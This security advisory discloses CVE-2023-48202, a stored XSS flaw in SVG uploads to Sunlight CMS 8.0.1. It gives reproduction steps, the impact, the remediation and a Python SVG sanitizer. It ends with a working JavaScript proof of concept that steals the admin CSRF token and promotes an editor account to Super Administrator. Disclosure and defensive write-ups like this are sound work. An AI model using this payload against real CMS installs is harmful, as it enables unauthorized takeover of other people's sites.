Mechaneus Security Research and Bug Hunting


CVE-2023-48202: Stored Cross-Site Scripting (XSS) in SVG image file uploaded in File Manager in Sunlight CMS 8.0.1

https://github.com/sunlight-cms/sunlight-cms

Vulnerability Type

CWE-79: Cross-site Scripting (XSS) - Stored

CVSS 5.4 MEDIUM

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Description

A user that is in the ‘Editors’ group, or in any group that can upload files in the File Manager, is able to upload an SVG file containing malicious JavaScript code. After an Administrator or Super Administrator clicks and opens the image, the malicious code is executed.

Execution steps

  1. Create a new user ‘editor1’ and add it to the group ‘Editors’.
  2. The user ‘editor1’ uploads a malicious SVG file.
  3. Access the image using the File Manager as a Super Administrator to execute the malicious code in the SVG image.
  4. User ‘editor1’ is added to the ‘Super Administrators’ group.

Impact

Stored Cross-Site Scripting vulnerability in Sunlight CMS 8.0.1 allows an authenticated low-privileged user to escalate their privileges. A malicious user that is in the ‘Moderators’ group, or in any group that can upload files in the File Manager, can escalate their privileges to any higher-level group, including Administrators and Super Administrators, without being authorized. The malicious user can then create, edit and delete any content in the CMS, create/edit/delete users with any privilege, and read the database using the backup functionality.

Remediation

Sanitize SVG image files by removing scripts before rendering, or convert SVG image files to safer formats like PNG and JPG.
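As an added illustration of the first remediation option (this is example code written for this page, not Sunlight CMS's own upload handling), the following server-side filter parses an uploaded SVG, drops script and foreignObject elements, strips on* event-handler attributes and javascript: hrefs, and reports what it removed so the upload can be logged or rejected. The sample SVG is constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Keep the usual prefixes when re-serializing instead of ns0:/ns1:.
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Elements that can carry executable content or embed arbitrary HTML.
DANGEROUS_TAGS = {"script", "foreignobject"}

def _local(name: str) -> str:
    """Strip the {namespace} part from an ElementTree tag/attribute name."""
    return name.split("}")[-1].lower()

def sanitize_svg(svg_text: str) -> tuple[str, list[str]]:
    """Return (cleaned SVG, list of removed items).

    For untrusted uploads in production, parse with defusedxml to also
    guard against entity-expansion attacks; stdlib ET is used here so the
    example runs without extra packages.
    """
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    parent_of = {child: parent for parent in root.iter() for child in parent}
    removed: list[str] = []
    for el in list(root.iter()):          # snapshot: we mutate the tree below
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            parent_of[el].remove(el)
            removed.append(f"<{tag}>")
            continue
        for attr in list(el.attrib):
            name = _local(attr)
            value = el.attrib[attr].strip().lower()
            if name.startswith("on"):     # onload=, onclick=, ...
                del el.attrib[attr]
                removed.append(f"@{name}")
            elif name == "href" and value.startswith("javascript:"):
                del el.attrib[attr]
                removed.append(f"@{name}=javascript:")
    return ET.tostring(root, encoding="unicode"), removed

# Constructed sample: an otherwise valid image carrying three script vectors.
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" width="10" height="10" '
    'onload="alert(1)">'
    '<rect width="10" height="10" fill="red"/>'
    '<a xlink:href="javascript:alert(2)"><circle r="3"/></a>'
    '<script type="text/javascript">var x = 1 &amp;&amp; 2;</script>'
    '</svg>'
)
```

A non-empty removal list is a strong signal that the file was not an innocent image, so rejecting the upload (and alerting) is usually preferable to silently serving the cleaned version.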

Proof of Concept code

Create a valid SVG image file and then add the following code:

<script type="text/javascript">
	var csrf_token;
	var xhrGET_users_edit = new XMLHttpRequest(); 
	xhrGET_users_edit.responseType = "document"; 
	xhrGET_users_edit.onreadystatechange = function() {	
		if (this.readyState == 4 &amp;&amp; this.status == 200) {
			var doc = this.responseXML ;
			csrf_token = doc.getElementsByName("_security_token")[0].value;		
			var xhr = new XMLHttpRequest();
			xhr.open("POST", "http:\/\/sunlight\/admin\/index.php?p=users-edit&amp;id=editor1", true);
			xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
			xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7");
			xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
			xhr.withCredentials = true;
			var body = "username=editor1&amp;publicname=editor1&amp;email=editor1%40test.tk&amp;password=&amp;group_id=1&amp;wysiwyg=1&amp;public=1&amp;note=&amp;_security_token="+csrf_token;
			var aBody = new Uint8Array(body.length);
			for (var i = 0; i &lt; aBody.length ; i++)
				aBody[i] = body.charCodeAt(i); 
			xhr.send(new Blob([aBody]));
		}
	};
	xhrGET_users_edit.open("GET", "/admin/index.php?p=users-edit&amp;id=editor1", true);
	xhrGET_users_edit.send();
</script>

References